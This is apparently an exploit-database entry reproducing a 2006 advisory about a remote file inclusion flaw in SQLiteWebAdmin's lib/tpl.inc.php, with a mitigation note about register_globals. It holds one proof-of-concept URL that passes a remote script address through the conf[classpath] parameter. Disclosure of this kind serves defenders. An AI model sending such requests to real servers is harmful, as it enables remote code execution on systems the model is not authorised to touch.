header-logo
Suggest Exploit
vendor:
SQLiteWebAdmin
by:
SirDarckCat
6,4
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: SQLiteWebAdmin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

SQLiteWebAdmin

SQLiteWebAdmin is a simple PHP program for administrating a SQL DataBase. It suffers from a Remote File Inclusion Vulnerability. The bug is in the 'tpl.inc.php' program in the 'lib' directory, and is exploited when passing the parameter 'conf[classpath]'. Succesfull explotation, needs register_globals=on

Mitigation:

Disable register_globals in the php.ini configuration file
Source

Exploit-DB raw data:

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att.
SirDarckCat
elhacker.net

# milw0rm.com [2006-08-07]

Navigation

Suggest Exploit

Services By CQR